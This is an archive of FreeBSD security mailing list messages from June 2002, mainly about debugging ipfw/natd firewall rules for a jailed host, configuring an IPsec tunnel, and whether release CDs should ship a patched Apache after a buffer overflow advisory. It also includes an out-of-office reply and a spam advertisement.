From: grimm
To: freebsd-security@freebsd.org
Date: Sun, 16 Jun 2002 13:42:01 -0400
Subject: ipfw-ntad-jail
Message-Id: <20020616134201.529b01aa.grimm@planetquake.com>

Greetings,

Ok, so I set up IPFW and NATd on my FreeBSD 4.5-RELEASE box, where I configured a jail environment. Here are some details for first-time readers:

I have a host computer called dagobah, which runs a virtual system in a jailed environment, called darkside. This system is running FreeBSD 4.5-RELEASE.

    host (dagobah)   xl0 IP 143.XX.XX.238
    jail (darkside)  IP alias to xl0 (192.168.200.13)

What had happened is that once I set up IPFW, I could no longer connect (a DNS lookup failure was causing a huge delay on connect) to my jail (darkside).

My other problem was making it possible to connect to these services from the outside world:

    host (dagobah)
        allow ftp (port 21)
        allow www (port 80)
        allow ssh (port 777)

    jail (darkside)
        allow ssh (port 22)

with natd forwarding all requests dagobah received on port 22 to the jail's sshd.

Everything else should be blocked.

=========== question =====================================

My DNS lookup problem with IPFW running is now solved; internally I can connect to my jail without any problem.

However, I can't connect from the outside world to my host (dagobah). I have tried to view the web page, as well as telnet, and both don't connect, although I do see in the IPFW SHOW output that some stuff seems to be reaching my port 80.

I would really appreciate it if someone could look at my configs and point out my mistake. I have pretty much just learned how to do this stuff, and I may have missed something obvious!

--------------

    # rc.conf
    #
    hostname="dagobah.somewhere.ca"
    ifconfig_xl0="inet 142.XX.XX.238 netmask 255.255.255.0"
    defaultrouter="142.XX.XX.254"
    inetd_enable="YES"
    kern_securelevel_enable="NO"
    linux_enable="YES"
    moused_enable="YES"
    nfs_reserved_port_only="YES"
    sendmail_enable="NO"
    sshd_enable="YES"
    usbd_enable="YES"
    quota_enable="YES"
    check_quotas="YES"
    firewall_enable="YES"
    firewall_script="/etc/rc.firewall"
    firewall_type="/etc/ipfw.rules"
    gateway_enable="YES"
    natd_enable="YES"
    natd_interface="xl0"
    natd_flags="-config /etc/natd_rules"
    inetd_flags="-wW -a 142.XX.XX.238"
    portmap_enable="NO"
    syslogd_flags="-ss"

--------------

    #
    # natd config (/etc/natd_config)
    #
    redirect_port tcp 192.168.200.13:22 22

--------------

    #
    # my ipfw.rules (additional to rc.firewall defaults)
    #
    #make sure natd gets a hold of the packets prior to FIREWALL
    add 00320 divert natd all from any to any via xl0
    #
    #
    # from man 8 ipfw: allow only outbound TCP connections I've created
    add 00350 check-state
    add 00351 deny tcp from any to any in established
    add 00352 allow tcp from any to any out setup keep-state
    #
    #
    #allow DNS
    add 00400 allow udp from 142.XX.XX.1 to any in recv xl0
    add 00401 allow udp from 142.XX.XX.2 to any in recv xl0
    add 00402 allow udp from 142.XX.XX.3 to any in recv xl0
    add 00403 allow udp from any to any out
    #
    #allow some ICMP types (codes not supported)
    ## allow path-mtu in both directions
    add 00600 allow icmp from any to any icmptypes 3
    ## allow source quench in and out
    add 00601 allow icmp from any to any icmptypes 4
    ## allow me to ping out and receive response back
    add 00602 allow icmp from any to any icmptypes 8 out
    add 00603 allow icmp from any to any icmptypes 0 in
    ## allow me to traceroute
    #
    # when I traceroute, I send out UDP packets (rule 00403)
    #
    add 00604 allow icmp from any to any icmptypes 11 in
    #
    #
    # enable www server on dagobah (142.XX.XX.238)
    add 00700 allow tcp from any to any 80 in via xl0
    add 00701 allow tcp from any to any 80 out via xl0
    #
    #
    # enable ssh server on dagobah (142.XX.XX.238)
    add 00702 allow tcp from any to any 777 in via xl0
    add 00703 allow tcp from any to any 777 out via xl0
    #
    #
    # enable ssh server on darkside (142.XX.XX.238)
    add 00704 allow tcp from any to any 22 in via xl0
    add 00705 allow tcp from any to any 22 out via xl0

--------------

OUTPUT OF THE IPFW SHOW command

    00100     0     0 allow ip from any to any via lo0
    00200     0     0 deny ip from any to 127.0.0.0/8
    00300     0     0 deny ip from 127.0.0.0/8 to any
    00320   171 34652 divert 8668 ip from any to any via xl0
    00350     0     0 check-state
    00351     0     0 deny tcp from any to any in established
    00352    78  8668 allow tcp from any to any keep-state out setup
    00400     2   482 allow udp from 142.XX.XX.1 to any in recv xl0
    00401     0     0 allow udp from 142.XX.XX.2 to any in recv xl0
    00402     0     0 allow udp from 142.XX.XX.3 to any in recv xl0
    00403     2   120 allow udp from any to any out
    00600     0     0 allow icmp from any to any icmptype 3
    00601     0     0 allow icmp from any to any icmptype 4
    00602     0     0 allow icmp from any to any out icmptype 8
    00603     0     0 allow icmp from any to any in icmptype 0
    00604     0     0 allow icmp from any to any in icmptype 11
    00700     3   144 allow tcp from any to any 80 in recv xl0
    00701     0     0 allow tcp from any to any 80 out xmit xl0
    00702     0     0 allow tcp from any to any 777 in recv xl0
    00703     0     0 allow tcp from any to any 777 out xmit xl0
    00704     0     0 allow tcp from any to any 22 in recv xl0
    00705     0     0 allow tcp from any to any 22 out xmit xl0
    65535    86 25238 deny ip from any to any

__
grimm

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From: "Crist J. Clark" <crist.clark@attbi.com>
To: grimm
Cc: freebsd-security@FreeBSD.ORG
Date: Sun, 16 Jun 2002 13:59:03 -0700
Subject: Re: ipfw-ntad-jail
Message-ID: <20020616135903.B94357@blossom.cjclark.org>
In-Reply-To: <20020616134201.529b01aa.grimm@planetquake.com>

On Sun, Jun 16, 2002 at 01:42:01PM -0400, grimm wrote:

[snip]

> #
> # my ipfw.rules (additional to rc.firewall defaults)
> #
> #make sure natd gets a hold of the packets prior to FIREWALL
> add 00320 divert natd all from any to any via xl0
> #
> #
> # from man 8 ipfw: allow only outbound TCP connections I've created
> add 00350 check-state
> add 00351 deny tcp from any to any in established
> add 00352 allow tcp from any to any out setup keep-state

[snip]

> # enable www server on dagobah (142.XX.XX.238)
> add 00700 allow tcp from any to any 80 in via xl0
> add 00701 allow tcp from any to any 80 out via xl0
> #
> #
> # enable ssh server on dagobah (142.XX.XX.238)
> add 00702 allow tcp from any to any 777 in via xl0
> add 00703 allow tcp from any to any 777 out via xl0
> #
> #
> # enable ssh server on darkside (142.XX.XX.238)
> add 00704 allow tcp from any to any 22 in via xl0
> add 00705 allow tcp from any to any 22 out via xl0

OK, some problems here. First, ITYM to have rules like,

    add allow tcp from any to me 80 in via xl0
    add allow tcp from me 80 to any out via xl0

No? Second, these won't work since you are blocking all TCP connections that are not using 'keep-state' with rule 351. But...

> 00100 0 0 allow ip from any to any via lo0
> 00200 0 0 deny ip from any to 127.0.0.0/8
> 00300 0 0 deny ip from 127.0.0.0/8 to any
> 00320 171 34652 divert 8668 ip from any to any via xl0
> 00350 0 0 check-state
> 00351 0 0 deny tcp from any to any in established

I don't see this rule incrementing.

> 00352 78 8668 allow tcp from any to any keep-state out setup
> 00400 2 482 allow udp from 142.XX.XX.1 to any in recv xl0
> 00401 0 0 allow udp from 142.XX.XX.2 to any in recv xl0
> 00402 0 0 allow udp from 142.XX.XX.3 to any in recv xl0
> 00403 2 120 allow udp from any to any out
> 00600 0 0 allow icmp from any to any icmptype 3
> 00601 0 0 allow icmp from any to any icmptype 4
> 00602 0 0 allow icmp from any to any out icmptype 8
> 00603 0 0 allow icmp from any to any in icmptype 0
> 00604 0 0 allow icmp from any to any in icmptype 11
> 00700 3 144 allow tcp from any to any 80 in recv xl0
> 00701 0 0 allow tcp from any to any 80 out xmit xl0
> 00702 0 0 allow tcp from any to any 777 in recv xl0
> 00703 0 0 allow tcp from any to any 777 out xmit xl0
> 00704 0 0 allow tcp from any to any 22 in recv xl0
> 00705 0 0 allow tcp from any to any 22 out xmit xl0
> 65535 86 25238 deny ip from any to any

Always a good idea to add a,

    65534 deny log ip from any to any

Or something like it to help debugging.

-- 
Crist J. Clark                     |     cjclark@alum.mit.edu     |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From: Bernhard Schmidt
To: freebsd-security@freebsd.org
Date: Sun, 16 Jun 2002 23:55:39 +0200
Subject: Too stupid for IPsec
Message-ID: <20020616215539.GA3675@thor.birkenwald.de>

Warning, this is quite long. I don't know whether there is a better group for IPsec-related things; if so, please drop me a note.

I just tried to establish a secure connection with IPsec between my router at home and my machine at work. The machine at home (heimdall) is running FBSD 4.6-RELEASE, the other one (lupus) is running FBSD 4.5-RELEASE-p4. Both have IPSEC, IPSEC_ESP and IPSEC_DEBUG integrated in the kernel. The structure of the network is as follows:

    At home:

    Windows ---+
               |          +----------+
    Linux   ---+----------+ heimdall +------- (some routers) ------->
               |          +----------+
    FreeBSD ---+       195.143.230.217/29
                       195.143.230.215/32 (alias)

                                                      +-------+
                                      <---------------+ lupus |
                                                      +-------+
                                                      195.143.155.4/32

At the moment I'm trying to encrypt/authenticate the data when there is a connection between frigg (a not-IPsec-aware Linux box in my /29 above) and lupus. As far as I have understood the documentation, I need tunnel mode in this case. My current approach looks like the following. I generated my SPI definitions into a file and copy&pasted them into "setkey -c" on both sides.

    add 195.143.230.215 195.143.155.4 esp 1000 -m tunnel
        -E rijndael-cbc "1234567890123456"
        -A hmac-sha1 "12345678901234567890" ;
    add 195.143.155.4 195.143.230.215 esp 2000 -m tunnel
        -E rijndael-cbc "2345678901234567"
        -A hmac-sha1 "23456789012345678901" ;

Then I created my SPDs by adding

    spdadd 195.143.230.220/32 195.143.155.4/32 any -P out ipsec
        esp/tunnel/195.143.230.215-195.143.155.4/require ;

on heimdall and

    spdadd 195.143.155.4/32 195.143.230.220/32 any -P out ipsec
        esp/tunnel/195.143.155.4-195.143.230.215/require ;

on lupus.

When I ping/telnet lupus from frigg and vice versa I can see ESP packets in tcpdump with the correct SPI. But nothing more happens. lupus does not react to anything it receives with ESP, and heimdall does not forward the (now unencrypted) packet to its second ethernet device. net.inet.ipsec.debug is set to "1" and I'm logging *.* to my server, but nothing shows up in the logfile (yes, syslog is set up correctly).

Any ideas what could be missing/wrong? Any help appreciated; I'm probably just too blind to see the obvious solution.
-- 
bye bye
Bernhard

From: Doug Barton
To: Bernhard Schmidt
Cc: freebsd-security@FreeBSD.ORG
Date: Sun, 16 Jun 2002 15:11:28 -0700
Subject: Re: Too stupid for IPsec
Message-ID: <3D0D0D10.AF4ED590@FreeBSD.org>
References: <20020616215539.GA3675@thor.birkenwald.de>

Bernhard Schmidt wrote:
>
> Warning, this is quite long. I don't know whether there is a better
> group for IPsec related things, if so please drop me a note.

"I can't get this to work" questions are never appropriate for -security. If in doubt, you should first try your question on freebsd-questions. Then someone might suggest a more appropriate group if you don't get a useful response.

Good luck,

Doug

-- 
"We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States, State of the Union, January 28, 2002

From: Bernhard Schmidt
To: Doug Barton
Cc: freebsd-security@FreeBSD.ORG
Date: Mon, 17 Jun 2002 00:15:24 +0200
Subject: Re: Too stupid for IPsec
Message-ID: <20020616221524.GA4524@thor.birkenwald.de>
In-Reply-To: <3D0D0D10.AF4ED590@FreeBSD.org>

On Sun, Jun 16, 2002 at 03:11:28PM -0700, Doug Barton wrote:
> > Warning, this is quite long. I don't know whether there is a better
> > group for IPsec related things, if so please drop me a note.
> "I can't get this to work" questions are never appropriate for
> -security. If in doubt, you should first try your question on
> freebsd-questions. Then someone might suggest a more appropriate group
> if you don't get a useful response.

Oh thanks, overlooked the most obvious mailing list. :-\

-- 
bye bye
Bernhard

From: javor.evstatiev@blue-c.com
To: security@FreeBSD.ORG
Date: Mon, 17 Jun 2002 01:01:31 +0200
Subject: Javor Evstatiev/Vienna/Blue-C is out of the office.

I will be out of the office starting 14.06.2002 and will not return until 09.09.2002. I will respond to your message when I return.
From: "Nielsen"
To: "grimm"
Date: Sun, 16 Jun 2002 17:37:24 -0700 (PDT)
Subject: Re: ipfw-ntad-jail
Message-Id: <20020617003724.43BC937B414@hub.freebsd.org>
References: <20020616134201.529b01aa.grimm@planetquake.com>

Hmmm, first of all (and maybe you've done this) you need to alias the jail's IP on your network card. Secondly, make sure that "net.inet.ip.fw.one_pass" is set to 1 (the default). Otherwise diverted packets will continue down the firewall after the divert rule.

Lastly, I would check that the packets are in fact getting NAT'd in. It may be the out that's the problem. I think in addition to the redirect_tcp you also have to do a proper NAT thing. In my understanding, redirections open holes to let stuff in, but for the packets to get back out proper NATting is required. OTOH, most of my experience is with ipnat, so I'm not sure here.

Nate

----- Original Message -----
From: "grimm"
Sent: Sunday, June 16, 2002 11:42
Subject: ipfw-ntad-jail

[original message quoted in full; snipped]
From: grimm
To: "Crist J. Clark"
Cc: crist.clark@attbi.com, freebsd-security@FreeBSD.ORG
Date: Sun, 16 Jun 2002 22:34:29 -0400
Subject: Re: ipfw-ntad-jail
Message-Id: <20020616223429.2f200728.grimm@planetquake.com>
In-Reply-To: <20020616135903.B94357@blossom.cjclark.org>

Greetings Crist,

What I find odd is that I read that section of my rules from a tutorial on the O'Reilly site. I read through a bunch of tutorials and help pages and never saw the keyword "me" being used. But I will definitely give it a try. Like I said, I read that 351 rule directly from a tutorial.

The problem I am having is that I don't have the machine at home, and sending messages to the list from work wasn't working! I am so glad to have gotten so much feedback already! I am new to this, but what can you suggest I do? Are there some rules in there you think are trouble and I should edit or comment out and test with something else? I mean, so far I've gotten great help, but no one has mentioned a specific rule which is WRONG! So I am not really sure where to begin. I'll take your advice and see where that leads.

As for the logging, great idea! I'll also enable log_in_vain.

cheers,
__
Andrew

"Crist J. Clark" wrote:
> OK, some problems here. First, ITYM to have rules like,
>
> add allow tcp from any to me 80 in via xl0
> add allow tcp from me 80 to any out via xl0
>
> No? Second, these won't work since you are blocking all TCP
> connections that are not using 'keep-state' with rule 351.
>>> add 00350 check-state
>>> add 00351 deny tcp from any to any in established
>>> add 00352 allow tcp from any to any out setup keep-state
> But...
> Always a good idea to add a,
>
> 65534 deny log ip from any to any
>
> Or something like it to help debugging.

From: grimm
To: "Nielsen"
Cc: freebsd-security@freebsd.org
Date: Sun, 16 Jun 2002 22:44:40 -0400
Subject: Re: ipfw-ntad-jail
Message-Id: <20020616224440.46dcdfaa.grimm@planetquake.com>
In-Reply-To: <200206170035.g5H0Zr3g029046@mail2.gamespy.com>

Greetings Nielsen,

On Sun, 16 Jun 2002 17:35:53 -0700 "Nielsen" wrote:

> Hmmm, first of all (and maybe you've done this) you need to alias the
> jail's ip on you network card.

Yes, I have aliased the IP to the network card with ipconfig.

> Secondly make sure that
> "net.inet.ip.fw.one_pass" is set to 1 (the default). Otherwise
> diverted packets will continue down the fire wall after the divert
> rule.

It's on my list of things to do. That could definitely be a huge problem, if the diverted packets were then being chewed up by a firewall rule.

> Lastly, I would check that the packets are in fact getting NAT'd in.
> It may be the out that's the problem.

How do I check that?

> I think in addition to the
> redirect_tcp you also have to do a proper NAT thing. In my
> inderstanding, redirections open holes to let stuff in, but for the
> packets to get back out proper Natting is required. OTOH, most of my
> experience is with ipnat, so I'm not sure here.

I am not sure if there is a proper NAT thing required, 'cause from within the machine I can ssh and telnet to the jail no problem. Do you think, given that it works from within, that it could still be a problem?

I am trying right now just to figure out why my web server and ssh on the host (dagobah) aren't responding. It seems like there is something fundamentally wrong with my firewall rules. No one has been able to pinpoint an exact major problem that could cause this. I think once I fix that, I could then concentrate on the jail issue. But right now, the simplest thing isn't working!

cheers,
__
Andrew

> ----- Original Message -----
> From: "grimm"
> Sent: Sunday, June 16, 2002 11:42
> Subject: ipfw-ntad-jail

[original message quoted in full; snipped]
majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 11: 5:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1800137B433 for ; Mon, 17 Jun 2002 11:04:16 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HI4FV88912 for security@freebsd.org; Mon, 17 Jun 2002 11:04:15 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 17 Jun 2002 11:04:15 -0700 (PDT) Message-Id: <200206171804.g5HI4FV88912@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 15:45:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from uol.com.br (proxy.nida.ac.th [203.151.38.3]) by hub.freebsd.org (Postfix) with SMTP id 34BE037B415; Mon, 17 Jun 2002 15:42:08 -0700 (PDT) Reply-To: "Atendimento on-line" From: "Atendimento on-line" Subject: Atendimento on-line Date: Wed, 12 Jun 2002 15:02:24 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000F_01C21222.49FCAF80" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020617224208.34BE037B415@hub.freebsd.org> To: 
undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Face to face with your customer in online support

The online support system lets your customer exchange information (messages) instantly with someone at your company. Online communication with no need for any additional software or plugin, straight from your WEBSITE.

It provides fast and effective support for your customer, with no need to wait for an e-mail reply or a phone call back. All of this at the exact moment your customer needs your help, so that they do not lose interest in your product or service.

Free trial period (15 days)

Visit our site to learn about this work tool: www.spinadesign.com.br/atendimentoonline

Tel.: (11) 6865-6249 5579-2815
email: atendimentoonline@spinadesign.com.br

We apologise if our contact was inopportune or does not interest you. Click here to be removed from our mailing list.


To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jun 17 21:57:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 6F80D37B440 for ; Mon, 17 Jun 2002 21:57:13 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "grimm" Cc: References: <20020616134201.529b01aa.grimm@planetquake.com><200206170035.g5H0Zr3g029046@mail2.gamespy.com> <20020616224440.46dcdfaa.grimm@planetquake.com> Subject: Re: ipfw-ntad-jail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020618045713.6F80D37B440@hub.freebsd.org> Date: Mon, 17 Jun 2002 21:57:13 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

> > Lastly, I would check that the packets are in fact getting NAT'd in.
> > It may be the out that's the problem.
>
> How do I check that?

I would disable the onepass setting above and put appropriate count and allow rules around the divert rule in the firewall. Then you could see exactly how it was getting translated. Secondly you could run natd with the logging option and you'll get some statistics out of there.

> > I think in addition to the redirect_tcp you also have to do a proper NAT
> > thing. In my understanding, redirections open holes to let stuff in, but
> > for the packets to get back out proper Natting is required. OTOH, most of
> > my experience is with ipnat, so I'm not sure here.
> > I am not sure if there is a proper nat thing required, cause > from within the machine, I can ssh and telnet to the jail no problem. > Do you think, given that it works from within, that it could still be > a problem? Within your machine normal routing is used to access any aliased IP. In fact it would probably be better if before the divert rule in your firewall you specifically allowed local traffic (so it doesn't get NAT'd). > I am trying right now, just to figure out why my web server, > and ssh on the host (dagobah) aren't responding. It seems like there > is something fundamentally wrong with my firewall rules. Hmmm, yes you're probably right there. Try enabling logging on any rule that blocks and then look at /var/log/security to see exactly which one it is and for which packets. Sometimes it's hard to tell from just looking at the rules what actually happens. All the best, Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 21:58:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 56EAF37B43C for ; Mon, 17 Jun 2002 21:57:58 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "grimm" Cc: References: <20020616134201.529b01aa.grimm@planetquake.com><200206170035.g5H0Zr3g029046@mail2.gamespy.com> <20020616224440.46dcdfaa.grimm@planetquake.com> Subject: Re: ipfw-ntad-jail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020618045758.56EAF37B43C@hub.freebsd.org> Date: Mon, 17 Jun 2002 21:57:58 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) 
List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > No one has been able to pinpoint an exact major problem that > could cause this. I think once I fix that, I could then concentrate > on the jail issue. But right now, the simplest thing isn't working! Something else just dawned on me. In order to get traffic coming into NAT to get forwarded to the host system, you need an option like this (for natd): -target_address 0.0.0.0 See man natd Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 22:40: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 1412D37B411 for ; Mon, 17 Jun 2002 22:39:59 -0700 (PDT) Received: (from brett@localhost) by lariat.org (8.9.3/8.9.3) id XAA26264 for security@freebsd.org; Mon, 17 Jun 2002 23:39:49 -0600 (MDT) Date: Mon, 17 Jun 2002 23:39:49 -0600 (MDT) From: Brett Glass Message-Id: <200206180539.XAA26264@lariat.org> To: security@freebsd.org Subject: CDs with patched Apache? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org As many folks are already aware, the version of Apache that's included in the FreeBSD ports and packages is subject to a buffer overflow which (at best) can cause a DoS and (at worst) can be used as a remote root exploit. The authors of the advisory from apache.org say that they believe 32-bit Unices can only be DoSed (see http://www.cert.org/advisories/CA-2002-17.html). But given the cleverness of skript creators, and the large number of potential target systems (Apache drives more than half the Web servers on the Net), we can't be 100% sure that someone won't find a clever way to smash the stack and root FreeBSD systems running vulnerable versions of Apache. 
Since Apache is one of the most commonly installed ports, disc vendors should strongly consider mastering their discs with a patched Apache. What's the status of the CDs and DVDs from various vendors? Will it be possible for them to "stop press" and do this? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 22:51: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 58CCE37B409 for ; Mon, 17 Jun 2002 22:50:57 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5I5ouCV052136; Mon, 17 Jun 2002 22:50:56 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5I5ouhA052135; Mon, 17 Jun 2002 22:50:56 -0700 (PDT) (envelope-from dillon) Date: Mon, 17 Jun 2002 22:50:56 -0700 (PDT) From: Matthew Dillon Message-Id: <200206180550.g5I5ouhA052135@apollo.backplane.com> To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: CDs with patched Apache? References: <200206180539.XAA26264@lariat.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :As many folks are already aware, the version of Apache that's included in the :FreeBSD ports and packages is subject to a buffer overflow which (at best) can :cause a DoS and (at worst) can be used as a remote root exploit. The authors :of the advisory from apache.org say that they believe 32-bit Unices can only :be DoSed (see http://www.cert.org/advisories/CA-2002-17.html). 
But given the :cleverness of skript creators, and the large number of potential target :systems (Apache drives more than half the Web servers on the Net), we can't be :100% sure that someone won't find a clever way to smash the stack and root :FreeBSD systems running vulnerable versions of Apache. : :Since Apache is one of the most commonly installed ports, disc vendors should :strongly consider mastering their discs with a patched Apache. What's the :status of the CDs and DVDs from various vendors? Will it be possible for them :to "stop press" and do this? : :--Brett Glass I don't think having the CD vendors hold up the release can be justified. Certainly the timing is bad.. it would have been nice to get the new Apache in, but security issues pop up all the time and I really doubt that most commercial users of FreeBSD actually install Apache from the CD. I don't know, of course, but that's my feeling. (I am far more worried about the ATA CDRom driver problems that are preventing a lot of people from installing the release. That might be sufficient to roll new ISOs if the problem can be fixed quickly, but I think it is too late even for something like that and if it is too late for that it is certainly too late to roll new ISOs to get a newer Apache). -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 23:31:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [208.8.184.14]) by hub.freebsd.org (Postfix) with ESMTP id 2E35337B405 for ; Mon, 17 Jun 2002 23:31:23 -0700 (PDT) Received: by blort.org (Postfix, from userid 1001) id BBC2121051; Mon, 17 Jun 2002 23:31:08 -0700 (PDT) Date: Mon, 17 Jun 2002 23:31:08 -0700 From: Kameron Gasso To: Brett Glass Cc: security@freebsd.org Subject: Re: CDs with patched Apache? 
Message-ID: <20020617233108.A84129@blort.org> Reply-To: kgasso@blort.org References: <200206180539.XAA26264@lariat.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206180539.XAA26264@lariat.org>; from brett@lariat.org on Mon, Jun 17, 2002 at 11:39:49PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

* At 22:40PDT on 06/17/2002, Brett Glass wrote:
> Since Apache is one of the most commonly installed ports, disc vendors should
> strongly consider mastering their discs with a patched Apache. What's the
> status of the CDs and DVDs from various vendors? Will it be possible for them
> to "stop press" and do this?

Wasn't the fact that -RELEASE branches don't get updated with new packages already discussed extensively in the not-so-distant past?

Although it wouldn't be very glamorous (and I certainly wouldn't recommend it), the port installed with the latest -RELEASE could be "broken" so it wouldn't download and install without someone forcing it. Still, this wouldn't really encourage them to upgrade their ports tree - it'd more than likely just cause much swearing and force people to work around the problem.

Long story short, no OS can keep an inexperienced admin from opening it up to security vulnerabilities...

This is just another case of bad timing. Not a lot that can be done. Shouldn't we just follow the same precedent set by prior security issues which were installable from the base system (BIND, OpenSSH, etc.)?
Regards,

--
Kameron Gasso
PGP key at http://blort.org/~kgasso/pgpkey.txt

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jun 18 2:49:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 73C8E37B404 for ; Tue, 18 Jun 2002 02:49:55 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id DAA27845; Tue, 18 Jun 2002 03:49:30 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618033604.00d42aa0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 03:49:28 -0600 To: kgasso@blort.org From: Brett Glass Subject: Re: CDs with patched Apache? Cc: security@FreeBSD.ORG In-Reply-To: <20020617233108.A84129@blort.org> References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 12:31 AM 6/18/2002, Kameron Gasso wrote:
> Wasn't the fact that -RELEASE branches don't get updated with new packages already discussed extensively in the not-so-distant past?
Some folks yelled at me for pointing it out, but alas there was no real discussion of how to solve the problem.

> Although it wouldn't be very glamorous (and I certainly wouldn't recommend it), the port installed with the latest -RELEASE could be "broken" so it wouldn't download and install without someone forcing it. Still, this wouldn't really encourage them to upgrade their ports tree - it'd more than likely just cause much swearing and force people to work around the problem.

It'd still be a warning. Hmmm.... Maybe the warning could be made part of pkg_add, and/or something that pkg_add executed. It would simply say, "proceed at your own risk!"

But if you were installing from CD, you wouldn't be warned. Unless.... Unless pkg_add phoned home to check on the package. Which is possible if the machine can be connected to the Net.

